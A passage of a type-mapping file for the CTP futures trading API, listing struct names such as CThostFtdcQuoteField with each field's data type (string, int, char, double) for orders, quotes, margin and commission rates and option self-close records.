"OpenAmount": "double",
"CloseAmount": "double",
"PositionCost": "double",
"PreMargin": "double",
"UseMargin": "double",
"FrozenMargin": "double",
"FrozenCash": "double",
"FrozenCommission": "double",
"CashIn": "double",
"Commission": "double",
"CloseProfit": "double",
"PositionProfit": "double",
"PreSettlementPrice": "double",
"SettlementPrice": "double",
"TradingDay": "string",
"SettlementID": "int",
"OpenCost": "double",
"ExchangeMargin": "double",
"CombPosition": "int",
"CombLongFrozen": "int",
"CombShortFrozen": "int",
"CloseProfitByDate": "double",
"CloseProfitByTrade": "double",
"TodayPosition": "int",
"MarginRateByMoney": "double",
"MarginRateByVolume": "double",
"StrikeFrozen": "int",
"StrikeFrozenAmount": "double",
"AbandonFrozen": "int",
"ExchangeID": "string",
"YdStrikeFrozen": "int",
"InvestUnitID": "string",
}
CThostFtdcSyncingInstrumentMarginRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"HedgeFlag": "char",
"LongMarginRatioByMoney": "double",
"LongMarginRatioByVolume": "double",
"ShortMarginRatioByMoney": "double",
"ShortMarginRatioByVolume": "double",
"IsRelative": "int",
}
CThostFtdcSyncingInstrumentCommissionRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"OpenRatioByMoney": "double",
"OpenRatioByVolume": "double",
"CloseRatioByMoney": "double",
"CloseRatioByVolume": "double",
"CloseTodayRatioByMoney": "double",
"CloseTodayRatioByVolume": "double",
}
CThostFtdcSyncingInstrumentTradingRightField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"TradingRight": "char",
}
CThostFtdcQryOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"OrderSysID": "string",
"InsertTimeStart": "string",
"InsertTimeEnd": "string",
"InvestUnitID": "string",
}
CThostFtdcQryTradeField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"TradeID": "string",
"TradeTimeStart": "string",
"TradeTimeEnd": "string",
"InvestUnitID": "string",
}
CThostFtdcQryInvestorPositionField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryTradingAccountField = {
"BrokerID": "string",
"InvestorID": "string",
"CurrencyID": "string",
"BizType": "char",
"AccountID": "string",
}
CThostFtdcQryInvestorField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcQryTradingCodeField = {
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
"ClientID": "string",
"ClientIDType": "char",
"InvestUnitID": "string",
}
CThostFtdcQryInvestorGroupField = {
"BrokerID": "string",
}
CThostFtdcQryInstrumentMarginRateField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryInstrumentCommissionRateField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryInstrumentTradingRightField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
}
CThostFtdcQryBrokerField = {
"BrokerID": "string",
}
CThostFtdcQryTraderField = {
"ExchangeID": "string",
"ParticipantID": "string",
"TraderID": "string",
}
CThostFtdcQrySuperUserFunctionField = {
"UserID": "string",
}
CThostFtdcQryUserSessionField = {
"FrontID": "int",
"SessionID": "int",
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcQryPartBrokerField = {
"ExchangeID": "string",
"BrokerID": "string",
"ParticipantID": "string",
}
CThostFtdcQryFrontStatusField = {
"FrontID": "int",
}
CThostFtdcQryExchangeOrderField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcQryOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
}
CThostFtdcQryExchangeOrderActionField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcQrySuperUserField = {
"UserID": "string",
}
CThostFtdcQryExchangeField = {
"ExchangeID": "string",
}
CThostFtdcQryProductField = {
"ProductID": "string",
"ProductClass": "char",
"ExchangeID": "string",
}
CThostFtdcQryInstrumentField = {
"InstrumentID": "string",
"ExchangeID": "string",
"ExchangeInstID": "string",
"ProductID": "string",
}
CThostFtdcQryDepthMarketDataField = {
"InstrumentID": "string",
"ExchangeID": "string",
}
CThostFtdcQryBrokerUserField = {
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcQryBrokerUserFunctionField = {
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcQryTraderOfferField = {
"ExchangeID": "string",
"ParticipantID": "string",
"TraderID": "string",
}
CThostFtdcQrySyncDepositField = {
"BrokerID": "string",
"DepositSeqNo": "string",
}
CThostFtdcQrySettlementInfoField = {
"BrokerID": "string",
"InvestorID": "string",
"TradingDay": "string",
"AccountID": "string",
"CurrencyID": "string",
}
CThostFtdcQryExchangeMarginRateField = {
"BrokerID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
"ExchangeID": "string",
}
CThostFtdcQryExchangeMarginRateAdjustField = {
"BrokerID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
}
CThostFtdcQryExchangeRateField = {
"BrokerID": "string",
"FromCurrencyID": "string",
"ToCurrencyID": "string",
}
CThostFtdcQrySyncFundMortgageField = {
"BrokerID": "string",
"MortgageSeqNo": "string",
}
CThostFtdcQryHisOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"OrderSysID": "string",
"InsertTimeStart": "string",
"InsertTimeEnd": "string",
"TradingDay": "string",
"SettlementID": "int",
}
CThostFtdcOptionInstrMiniMarginField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"MinMargin": "double",
"ValueMethod": "char",
"IsRelative": "int",
}
CThostFtdcOptionInstrMarginAdjustField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"SShortMarginRatioByMoney": "double",
"SShortMarginRatioByVolume": "double",
"HShortMarginRatioByMoney": "double",
"HShortMarginRatioByVolume": "double",
"AShortMarginRatioByMoney": "double",
"AShortMarginRatioByVolume": "double",
"IsRelative": "int",
"MShortMarginRatioByMoney": "double",
"MShortMarginRatioByVolume": "double",
}
CThostFtdcOptionInstrCommRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"OpenRatioByMoney": "double",
"OpenRatioByVolume": "double",
"CloseRatioByMoney": "double",
"CloseRatioByVolume": "double",
"CloseTodayRatioByMoney": "double",
"CloseTodayRatioByVolume": "double",
"StrikeRatioByMoney": "double",
"StrikeRatioByVolume": "double",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcOptionInstrTradeCostField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
"FixedMargin": "double",
"MiniMargin": "double",
"Royalty": "double",
"ExchFixedMargin": "double",
"ExchMiniMargin": "double",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryOptionInstrTradeCostField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
"InputPrice": "double",
"UnderlyingPrice": "double",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryOptionInstrCommRateField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcIndexPriceField = {
"BrokerID": "string",
"InstrumentID": "string",
"ClosePrice": "double",
}
CThostFtdcInputExecOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExecOrderRef": "string",
"UserID": "string",
"Volume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"OffsetFlag": "char",
"HedgeFlag": "char",
"ActionType": "char",
"PosiDirection": "char",
"ReservePositionFlag": "char",
"CloseFlag": "char",
"ExchangeID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"ClientID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcInputExecOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExecOrderActionRef": "int",
"ExecOrderRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"ExecOrderSysID": "string",
"ActionFlag": "char",
"UserID": "string",
"InstrumentID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcExecOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExecOrderRef": "string",
"UserID": "string",
"Volume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"OffsetFlag": "char",
"HedgeFlag": "char",
"ActionType": "char",
"PosiDirection": "char",
"ReservePositionFlag": "char",
"CloseFlag": "char",
"ExecOrderLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderSubmitStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"ExecOrderSysID": "string",
"InsertDate": "string",
"InsertTime": "string",
"CancelTime": "string",
"ExecResult": "char",
"ClearingPartID": "string",
"SequenceNo": "int",
"FrontID": "int",
"SessionID": "int",
"UserProductInfo": "string",
"StatusMsg": "string",
"ActiveUserID": "string",
"BrokerExecOrderSeq": "int",
"BranchID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcExecOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExecOrderActionRef": "int",
"ExecOrderRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"ExecOrderSysID": "string",
"ActionFlag": "char",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"ExecOrderLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"ActionType": "char",
"StatusMsg": "string",
"InstrumentID": "string",
"BranchID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryExecOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"ExecOrderSysID": "string",
"InsertTimeStart": "string",
"InsertTimeEnd": "string",
}
CThostFtdcExchangeExecOrderField = {
"Volume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"OffsetFlag": "char",
"HedgeFlag": "char",
"ActionType": "char",
"PosiDirection": "char",
"ReservePositionFlag": "char",
"CloseFlag": "char",
"ExecOrderLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderSubmitStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"ExecOrderSysID": "string",
"InsertDate": "string",
"InsertTime": "string",
"CancelTime": "string",
"ExecResult": "char",
"ClearingPartID": "string",
"SequenceNo": "int",
"BranchID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryExchangeExecOrderField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcQryExecOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
}
CThostFtdcExchangeExecOrderActionField = {
"ExchangeID": "string",
"ExecOrderSysID": "string",
"ActionFlag": "char",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"ExecOrderLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"ActionType": "char",
"BranchID": "string",
"IPAddress": "string",
"MacAddress": "string",
"ExchangeInstID": "string",
"Volume": "int",
}
CThostFtdcQryExchangeExecOrderActionField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcErrExecOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExecOrderRef": "string",
"UserID": "string",
"Volume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"OffsetFlag": "char",
"HedgeFlag": "char",
"ActionType": "char",
"PosiDirection": "char",
"ReservePositionFlag": "char",
"CloseFlag": "char",
"ExchangeID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"ClientID": "string",
"IPAddress": "string",
"MacAddress": "string",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcQryErrExecOrderField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcErrExecOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExecOrderActionRef": "int",
"ExecOrderRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"ExecOrderSysID": "string",
"ActionFlag": "char",
"UserID": "string",
"InstrumentID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcQryErrExecOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcOptionInstrTradingRightField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"Direction": "char",
"TradingRight": "char",
}
CThostFtdcQryOptionInstrTradingRightField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"Direction": "char",
}
CThostFtdcInputForQuoteField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ForQuoteRef": "string",
"UserID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcForQuoteField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ForQuoteRef": "string",
"UserID": "string",
"ForQuoteLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"InsertDate": "string",
"InsertTime": "string",
"ForQuoteStatus": "char",
"FrontID": "int",
"SessionID": "int",
"StatusMsg": "string",
"ActiveUserID": "string",
"BrokerForQutoSeq": "int",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryForQuoteField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InsertTimeStart": "string",
"InsertTimeEnd": "string",
"InvestUnitID": "string",
}
CThostFtdcExchangeForQuoteField = {
"ForQuoteLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"InsertDate": "string",
"InsertTime": "string",
"ForQuoteStatus": "char",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryExchangeForQuoteField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcInputQuoteField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"QuoteRef": "string",
"UserID": "string",
"AskPrice": "double",
"BidPrice": "double",
"AskVolume": "int",
"BidVolume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"AskOffsetFlag": "char",
"BidOffsetFlag": "char",
"AskHedgeFlag": "char",
"BidHedgeFlag": "char",
"AskOrderRef": "string",
"BidOrderRef": "string",
"ForQuoteSysID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
"ClientID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcInputQuoteActionField = {
"BrokerID": "string",
"InvestorID": "string",
"QuoteActionRef": "int",
"QuoteRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"QuoteSysID": "string",
"ActionFlag": "char",
"UserID": "string",
"InstrumentID": "string",
"InvestUnitID": "string",
"ClientID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQuoteField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"QuoteRef": "string",
"UserID": "string",
"AskPrice": "double",
"BidPrice": "double",
"AskVolume": "int",
"BidVolume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"AskOffsetFlag": "char",
"BidOffsetFlag": "char",
"AskHedgeFlag": "char",
"BidHedgeFlag": "char",
"QuoteLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"NotifySequence": "int",
"OrderSubmitStatus": "char",
"TradingDay": "string",
"SettlementID": "int",
"QuoteSysID": "string",
"InsertDate": "string",
"InsertTime": "string",
"CancelTime": "string",
"QuoteStatus": "char",
"ClearingPartID": "string",
"SequenceNo": "int",
"AskOrderSysID": "string",
"BidOrderSysID": "string",
"FrontID": "int",
"SessionID": "int",
"UserProductInfo": "string",
"StatusMsg": "string",
"ActiveUserID": "string",
"BrokerQuoteSeq": "int",
"AskOrderRef": "string",
"BidOrderRef": "string",
"ForQuoteSysID": "string",
"BranchID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQuoteActionField = {
"BrokerID": "string",
"InvestorID": "string",
"QuoteActionRef": "int",
"QuoteRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"QuoteSysID": "string",
"ActionFlag": "char",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"QuoteLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"StatusMsg": "string",
"InstrumentID": "string",
"BranchID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryQuoteField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"QuoteSysID": "string",
"InsertTimeStart": "string",
"InsertTimeEnd": "string",
"InvestUnitID": "string",
}
CThostFtdcExchangeQuoteField = {
"AskPrice": "double",
"BidPrice": "double",
"AskVolume": "int",
"BidVolume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"AskOffsetFlag": "char",
"BidOffsetFlag": "char",
"AskHedgeFlag": "char",
"BidHedgeFlag": "char",
"QuoteLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"NotifySequence": "int",
"OrderSubmitStatus": "char",
"TradingDay": "string",
"SettlementID": "int",
"QuoteSysID": "string",
"InsertDate": "string",
"InsertTime": "string",
"CancelTime": "string",
"QuoteStatus": "char",
"ClearingPartID": "string",
"SequenceNo": "int",
"AskOrderSysID": "string",
"BidOrderSysID": "string",
"ForQuoteSysID": "string",
"BranchID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryExchangeQuoteField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcQryQuoteActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
}
CThostFtdcExchangeQuoteActionField = {
"ExchangeID": "string",
"QuoteSysID": "string",
"ActionFlag": "char",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"QuoteLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryExchangeQuoteActionField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcOptionInstrDeltaField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"Delta": "double",
}
CThostFtdcForQuoteRspField = {
"TradingDay": "string",
"InstrumentID": "string",
"ForQuoteSysID": "string",
"ForQuoteTime": "string",
"ActionDay": "string",
"ExchangeID": "string",
}
CThostFtdcStrikeOffsetField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"Offset": "double",
"OffsetType": "char",
}
CThostFtdcQryStrikeOffsetField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
}
CThostFtdcInputBatchOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OrderActionRef": "int",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"UserID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcBatchOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OrderActionRef": "int",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"StatusMsg": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcExchangeBatchOrderActionField = {
"ExchangeID": "string",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryBatchOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
}
CThostFtdcCombInstrumentGuardField = {
"BrokerID": "string",
"InstrumentID": "string",
"GuarantRatio": "double",
"ExchangeID": "string",
}
CThostFtdcQryCombInstrumentGuardField = {
"BrokerID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
}
CThostFtdcInputCombActionField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"CombActionRef": "string",
"UserID": "string",
"Direction": "char",
"Volume": "int",
"CombDirection": "char",
"HedgeFlag": "char",
"ExchangeID": "string",
"IPAddress": "string",
"MacAddress": "string",
"InvestUnitID": "string",
}
CThostFtdcCombActionField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"CombActionRef": "string",
"UserID": "string",
"Direction": "char",
"Volume": "int",
"CombDirection": "char",
"HedgeFlag": "char",
"ActionLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"ActionStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"SequenceNo": "int",
"FrontID": "int",
"SessionID": "int",
"UserProductInfo": "string",
"StatusMsg": "string",
"IPAddress": "string",
"MacAddress": "string",
"ComTradeID": "string",
"BranchID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryCombActionField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcExchangeCombActionField = {
"Direction": "char",
"Volume": "int",
"CombDirection": "char",
"HedgeFlag": "char",
"ActionLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"ActionStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"SequenceNo": "int",
"IPAddress": "string",
"MacAddress": "string",
"ComTradeID": "string",
"BranchID": "string",
}
CThostFtdcQryExchangeCombActionField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcProductExchRateField = {
"ProductID": "string",
"QuoteCurrencyID": "string",
"ExchangeRate": "double",
"ExchangeID": "string",
}
CThostFtdcQryProductExchRateField = {
"ProductID": "string",
"ExchangeID": "string",
}
CThostFtdcQryForQuoteParamField = {
"BrokerID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
}
CThostFtdcForQuoteParamField = {
"BrokerID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"LastPrice": "double",
"PriceInterval": "double",
}
CThostFtdcMMOptionInstrCommRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"OpenRatioByMoney": "double",
"OpenRatioByVolume": "double",
"CloseRatioByMoney": "double",
"CloseRatioByVolume": "double",
"CloseTodayRatioByMoney": "double",
"CloseTodayRatioByVolume": "double",
"StrikeRatioByMoney": "double",
"StrikeRatioByVolume": "double",
}
CThostFtdcQryMMOptionInstrCommRateField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
}
CThostFtdcMMInstrumentCommissionRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"OpenRatioByMoney": "double",
"OpenRatioByVolume": "double",
"CloseRatioByMoney": "double",
"CloseRatioByVolume": "double",
"CloseTodayRatioByMoney": "double",
"CloseTodayRatioByVolume": "double",
}
CThostFtdcQryMMInstrumentCommissionRateField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
}
CThostFtdcInstrumentOrderCommRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"HedgeFlag": "char",
"OrderCommByVolume": "double",
"OrderActionCommByVolume": "double",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryInstrumentOrderCommRateField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
}
CThostFtdcTradeParamField = {
"BrokerID": "string",
"TradeParamID": "char",
"TradeParamValue": "string",
"Memo": "string",
}
CThostFtdcInstrumentMarginRateULField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"HedgeFlag": "char",
"LongMarginRatioByMoney": "double",
"LongMarginRatioByVolume": "double",
"ShortMarginRatioByMoney": "double",
"ShortMarginRatioByVolume": "double",
}
CThostFtdcFutureLimitPosiParamField = {
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"ProductID": "string",
"SpecOpenVolume": "int",
"ArbiOpenVolume": "int",
"OpenVolume": "int",
}
CThostFtdcLoginForbiddenIPField = {
"IPAddress": "string",
}
CThostFtdcIPListField = {
"IPAddress": "string",
"IsWhite": "int",
}
CThostFtdcInputOptionSelfCloseField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OptionSelfCloseRef": "string",
"UserID": "string",
"Volume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"HedgeFlag": "char",
"OptSelfCloseFlag": "char",
"ExchangeID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"ClientID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcInputOptionSelfCloseActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OptionSelfCloseActionRef": "int",
"OptionSelfCloseRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"OptionSelfCloseSysID": "string",
"ActionFlag": "char",
"UserID": "string",
"InstrumentID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcOptionSelfCloseField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OptionSelfCloseRef": "string",
"UserID": "string",
"Volume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"HedgeFlag": "char",
"OptSelfCloseFlag": "char",
"OptionSelfCloseLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderSubmitStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"OptionSelfCloseSysID": "string",
"InsertDate": "string",
"InsertTime": "string",
"CancelTime": "string",
"ExecResult": "char",
"ClearingPartID": "string",
"SequenceNo": "int",
"FrontID": "int",
"SessionID": "int",
"UserProductInfo": "string",
"StatusMsg": "string",
"ActiveUserID": "string",
"BrokerOptionSelfCloseSeq": "int",
"BranchID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcOptionSelfCloseActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OptionSelfCloseActionRef": "int",
"OptionSelfCloseRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"OptionSelfCloseSysID": "string",
"ActionFlag": "char",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"OptionSelfCloseLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"StatusMsg": "string",
"InstrumentID": "string",
"BranchID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryOptionSelfCloseField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"OptionSelfCloseSysID": "string",
"InsertTimeStart": "string",
